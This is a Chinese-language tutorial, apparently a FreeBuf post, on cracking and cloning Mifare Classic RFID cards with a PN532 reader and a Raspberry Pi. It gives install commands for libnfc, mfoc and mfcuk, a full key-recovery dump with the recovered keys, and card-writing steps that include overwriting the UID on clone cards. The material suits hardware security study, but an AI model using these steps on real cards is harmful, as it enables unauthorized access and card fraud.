引言
鑒於硬件安全對於大多數新人是較少接觸的,而這方面又非常吸引我,但是部分專業安全研究設備較高的價格使人望而卻步。在該系列中,筆者希望對此感興趣的讀者在花費較少金錢的情況下體會到硬件安全的魅力所在。本系列計划分成四個部分:BadUSB on Arduino; RFID on PN532; GSM on Motorola C118 ; SDR on RTL2832U(電視棒)。
背景
早在2007年,Mifare M1 RFID卡片就被研究人員破解了出來。NXP公司在M1卡上使用了未公開的加密算法,然而密碼學史上的種種教訓都表明了“不公開”與“安全的”並沒有什么聯系。研究人員剖析了卡片的門電路結構從而逆向了加密的算法並發現了漏洞。M1卡的結構如圖所示,其擁有16個扇區,每個扇區有4個塊,每個扇區的第一塊儲存着扇區的密鑰。
目前針對Mifare卡片的攻擊主要有三種方法:
Nested攻擊
簡單地說,就是默認密碼攻擊。
由於M1卡片有16個扇區,在絕大多數情況下16個扇區不一定會同時使用到。於是根據廠商在出廠時預設的密碼可能碰撞出其中某一個扇區的密碼。
由於無源的M1卡每一次刷卡上電的時候,密鑰交換采用的隨機數都是“有規律”的,用已經碰撞出的某一扇區的密鑰去試探其它扇區,在此時根據隨機數的規律即可“套”出密碼
Darkside攻擊
簡單地說就是暴力破解,即爆破出某一個扇區的密鑰,之后再使用Nested攻擊就能Dump出整張卡。
而與通常意義上的暴力破解不同的是,由於M1卡片的認證機制,其會泄露部分認證信息,從而大大加快爆破的進度。
電波嗅探
顧名思義,即在正常刷卡的時候嗅探卡片與讀卡器交換的數據,從而逆向密碼。
這里可以參考2014年BlackHat的PDF:
以及相關論文:
http://www.cs.ru.nl/~flaviog/publications/Attack.MIFARE.pdf
常見硬件介紹
不同於之前BadUSB,在這方面可供我們選擇的並不多。
旗艦級All-in-one的Proxmark3
國外的開源硬件,由FPGA驅動。性能十分強大,集嗅探、讀取、克隆於一體,玩得了高頻卡艹得動低頻卡。可以插電腦可以接電源。當然其價格也是十分的感人。不過某寶上近期出現了400多元的V2版本,也不知道是如何做到將價格放到那么低的————國外的V1版本也要300多,只不過人家的是美刀。
偽裝性:★★
易用性:★★★★
社區支持:★★★★
項目主頁
國外最近出現的ChameleonMini
如果不是因為要寫此文特意去搜集了許多相關資料我還真不知道這玩意。這是德國的一個眾籌項目,其和PM3差不多,擁有偽裝卡的功能,從外形上看厚度與真正的卡片差不多,但是價格在國外比PM3要友好許多。
偽裝性:★★★★
易用性:★★★
社區支持:★★★
項目主頁
https://github.com/emsec/ChameleonMini/wiki
最流行的讀卡器ACR122
反正就是很流行,大抵是因為網絡上流傳了非常強大的GUI改卡讀卡復制卡軟件吧!某寶價格一百多,但還是比我們今天所用到的硬件高出了那么三四倍。
偽裝性:★
易用性:★★★★
社區支持:★★
PN532
根據上篇的經驗,之前介紹的那坨東西肯定是不會用到的———因為窮啊!本品某寶價格在30至50元。
本篇的主角是PN532,我將其與樹莓派連接使用。當然沒有樹莓派也沒關系(買一個就完了),也可以使用UART轉USB的接口連接電腦使用。接下來的篇幅將從樹莓派的構建開始詳細講解其玩法。
系統搭建
以主機為windows系統為例,linux自行解決。
系統准備
去https://www.raspberrypi.org/上下載最新的Raspbian Jessie 系統,筆者下載時的發布日是2017-02-16。
使用win32diskimager將解壓后的img鏡像文件燒寫到sd卡上
注意新版本的Raspbian是默認不開啟ssh的,所以我們需要在boot分區下創建一個名為ssh(小寫!!!!)的文件
ssh進去,用戶名pi,密碼raspberry
系統配置
執行sudo raspi-config進行配置.
選擇5-Interface Options,啟用SPI、I2C,禁用Serial
選擇7-Advanced Options,1-Expand Filesystem 擴展分區
安裝依賴
依賴:
autoconf
libusb-dev
libtool
libpcsclite-dev
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install autoconf libusb-dev libtool libpcsclite-dev
工具安裝
部分參考:https://firefart.at/post/how-to-crack-mifare-classic-cards/
樹莓派與PN532連接
筆者用的是樹莓派3,但是GPIO口的區別不大,與PN532的連接方式為:
04 <-> VCC
06 <-> GND
08 <-> RXD
10 <-> TXD
libnfc
顧名思義,nfc庫。
官方github:https://github.com/nfc-tools/libnfc
wget https://github.com/nfc-tools/libnfc/releases/download/libnfc-1.7.1/libnfc-1.7.1.tar.bz2
tar -jxvf libnfc-1.7.1.tar.bz2
cd libnfc-1.7.1
autoreconf -vis
./configure --with-drivers=all --sysconfdir=/etc --prefix=/usr
make
sudo make install
sudo mkdir /etc/nfc
sudo mkdir /etc/nfc/devices.d
由於我們使用UART接口直接和PN532在樹莓派上連接,還需要
sudo cp contrib/libnfc/pn532_uart_on_rpi.conf.sample /etc/nfc/devices.d/pn532_uart_on_rpi.conf
此時在不放卡與放卡的時候分別執行nfc-list,輸出如下:
mfoc
mfoc即上述nested攻擊的實現。
官方github:https://github.com/nfc-tools/mfoc
git clone https://github.com/nfc-tools/mfoc.git
cd mfoc/
autoreconf -vis
./configure
make
sudo make install
mfoc用法如下:
Usage: mfoc [-h] [-k key] [-f file] … [-P probnum] [-T tolerance] [-O output]
h print this help and exit
k try the specified key in addition to the default keys
//指定key
f parses a file of keys to add in addition to the default keys
//用文件為輸入指定多個key
P number of probes per sector, instead of default of 20
//每個扇區測試密鑰數目
T nonce tolerance half-range, instead of default of 20
(i.e., 40 for the total range, in both directions)
O file in which the card contents will be written (REQUIRED)
//輸出dump的文件
D file in which partial card info will be written in case PRNG is not vulnerable
Example: mfoc -O mycard.mfd
Example: mfoc -k ffffeeeedddd -O mycard.mfd
Example: mfoc -f keys.txt -O mycard.mfd
Example: mfoc -P 50 -T 30 -O mycard.mfd
This is mfoc version 0.10.7.
For more information, run: ‘man mfoc’.
[mfoc -h]
簡單地執行mfoc -O out.mfd,會dump出當前的卡片信息:
mfoc -O out.mfd
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
UID size: single
bit frame anticollision supported
UID (NFCID1): 10 bc 79 ce
SAK (SEL_RES): 08
Not compliant with ISO/IEC 14443-4
Not compliant with ISO/IEC 18092
Fingerprinting based on MIFARE type Identification Procedure:
MIFARE Classic 1K
MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:
Try to authenticate to all sectors with default keys…
Symbols: ‘.’ no key found, ‘/‘ A key found, ‘\’ B key found, ‘x’ both keys found
[Key: ffffffffffff] -> [.xxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [.xxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [.xxxxxxxxxxxxxxx]
[Key: 000000000000] -> [.xxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [.xxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [.xxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [.xxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [.xxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [.xxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [.xxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [.xxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [.xxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [.xxxxxxxxxxxxxxx]
Sector 00 - Unknown Key A Unknown Key B
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 05 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 06 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 07 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 08 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 09 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 10 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 11 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 12 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 13 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 14 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Using sector 01 as an exploit sector
Sector: 0, type A, probe 0, distance 12851 …..
Sector: 0, type A, probe 1, distance 12845 …..
Sector: 0, type A, probe 2, distance 12847 …..
Sector: 0, type A, probe 3, distance 12851 …..
Sector: 0, type A, probe 4, distance 12849 …..
Found Key: A [11dc95b2bd87]
Data read with Key A revealed Key B: [11dc95b2bd87] - checking Auth: OK
Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 59, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 58, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 57, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 56, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 55, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 54, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 53, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 52, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 51, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 50, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 49, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 48, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 47, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 46, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 45, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 44, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 43, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 42, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 41, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 40, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 39, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 38, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 37, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 36, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 35, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 34, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 33, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 32, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 31, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 30, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 29, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 28, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 27, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 26, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 25, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 24, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 23, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 22, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 21, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 20, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 19, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 18, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 17, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 16, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 15, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 14, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 13, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 12, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 11, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 10, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 09, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 08, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 07, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 06, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 05, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 03, type A, key 11dc95b2bd87 :00 00 00 00 00 00 ff 07 80 69 11 dc 95 b2 bd 87
Block 02, type A, key 11dc95b2bd87 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 01, type A, key 11dc95b2bd87 :5e dc bf dd 4b fd cf ff 87 d4 00 00 00 00 00 00
Block 00, type A, key 11dc95b2bd87 :10 bc 79 ce 1b 08 04 00 62 63 64 65 66 67 68 69
[mfoc -O out.mfd]
mfcuk
官方github:https://github.com/nfc-tools/mfcuk
mfcuk(不是mfuck!!!)即上述darkside攻擊的實現。
git clone https://github.com/nfc-tools/mfcuk.git
cd mfcuk
autoreconf -vis
./configure
make
sudo make install
用法如下:
mfcuk - 0.3.8
Mifare Classic DarkSide Key Recovery Tool - 0.3
by Andrei Costin, zveriu@gmail.com, http://andreicostin.com
Usage:
-C - require explicit connection to the reader. Without this option, the connection is not made and recovery will not occur
-i mifare.dmp - load input mifare_classic_tag type dump
-I mifare_ext.dmp - load input extended dump specific to this tool, has several more fields on top of mifare_classic_tag type dump
-o mifare.dmp - output the resulting mifare_classic_tag dump to a given file
-O mifare_ext.dmp - output the resulting extended dump to a given file
-V sector[:A/B/any_other_alphanum[:fullkey]] - verify key for specified sector, -1 means all sectors
After first semicolon key-type can specified: A verifies only keyA, B verifies only keyB, anything else verifies both keys
After second semicolon full 12 hex-digits key can specified - this key will override any loaded dump key for the given sector(s) and key-type(s)
-R sector[:A/B/any_other_alphanum] - recover key for sector, -1 means all sectors.
After first semicolon key-type can specified: A recovers only keyA, B recovers only keyB, anything else recovers both keys
-U UID - force specific UID. If a dump was loaded with -i, -U will overwrite the in the memory where dump was loaded
-M tagtype - force specific tagtype. 8 is 1K, 24 is 4K, 32 is DESFire
-D - for sectors and key-types marked for verification, in first place use default keys to verify (maybe you are lucky)
-d key - specifies additional full 12 hex-digits default key to be checked. Multiple -d options can be used for more additional keys
-s - milliseconds to sleep for SLEEP_AT_FIELD_OFF (Default: 10 ms)
-S - milliseconds to sleep for SLEEP_AFTER_FIELD_ON (Default: 50 ms)
-P hex_literals_separated - try to recover the key from a conversation sniffed with Proxmark3 (mifarecrack.c based). Accepts several options:
Concatenated string in hex literal format of form uid:tag_chal:nr_enc:reader_resp:tag_resp
Example -P 0x5c72325e:0x50829cd6:0xb8671f76:0xe00eefc9:0x4888964f would find key FFFFFFFFFFFF
-p proxmark3_full.log - tries to parse the log file on it’s own (mifarecrack.py based), get the values for option -P and invoke it
-F - tries to fingerprint the input dump (-i) against known cards’ data format
-v verbose_level - verbose level (default is O)
Usage examples:
Recove all keys from all sectors:
mfcuk -C -R -1
Recove the sector #0 key with 250 ms for all delays (delays could give more results):
mfcuk -C -R 0 -s 250 -S 250
[mfcuk]
鑒於篇幅關系,這里不詳細介紹了
寫卡
直接使用nfc-mfclassic即可對Mifare classic系列卡片寫入。主要有M1卡(S50)和4K卡(S70)。
用法如下:
nfc-mfclassic
Usage: nfc-mfclassic f|r|R|w|W a|b [ [f]]
f|r|R|w|W - Perform format (f) or read from (r) or unlocked read from (R) or write to (w) or unlocked write to (W) card
format will reset all keys to FFFFFFFFFFFF and all data to 00 and all ACLs to default unlocked read does not require authentication and will reveal A and B keys
note that unlocked write will attempt to overwrite block 0 including UID unlocking only works with special Mifare 1K cards (Chinese clones)
a|A|b|B - Use A or B keys for action; Halt on errors (a|b) or tolerate errors (A|B)
- MiFare Dump (MFD) used to write (card to MFD) or (MFD to card)
- MiFare Dump (MFD) that contain the keys (optional)
f - Force using the keyfile even if UID does not match (optional)
Examples:
Read card to file, using key A:
nfc-mfclassic r a mycard.mfd
Write file to blank card, using key A:
nfc-mfclassic w a mycard.mfd
Write new data and/or keys to previously written card, using key A:
nfc-mfclassic w a newdata.mfd mycard.mfd
Format/wipe card (note two passes required to ensure writes for all ACL cases):
nfc-mfclassic f A dummy.mfd keyfile.mfd fnfc-mfclassic f B dummy.mfd keyfile.mfd f
[nfc-mfclassic]
這里要額外說明的是,M1卡的UID區域是只讀不可寫的,然而一些商家不符合規范(中國的牛B商家)吧0扇區的UID弄成了可寫的,用W可以強行寫入。
A|B代表用密鑰A或者B寫入(均可),這里牽扯到Mifare協議的東西,讀者可以自行查閱相關資料。
結語
本文所含內容具有一定攻擊性,切勿用於非法用途!弄出什么新聞也別找我負責!
關於PN532
由於查到PN532是支持Ultralight卡片的,但是筆者的PN532始終無法讀取該類卡片,於是到elechouse的Github Issue中詢問了關於PN532的問題————他們表面他們自己生產的PN532可以讀幾乎符合NFC協議的一切卡片,但是萬惡的某寶在山寨的時候似乎閹割了一些功能,但是筆者測試1k和4k卡片都是可用的。
在手機上的奇技淫巧
在帶有NFC功能的Android手機上有一款名為Mifare Classic Tools的軟件,可以進行讀寫卡,dump的操作————但是必須用對密鑰哦!可以在樹莓派上破解之后把密鑰添加進去,然后就能用手機進行讀寫卡了。至於用途,你懂的。
GGPLY鏈接:https://play.google.com/store/apps/details?id=de.syss.MifareClassicTool&hl=zh 自備梯子
* 原創作者:ya0guang,本文屬FreeBuf原創獎勵計划,未經許可禁止轉載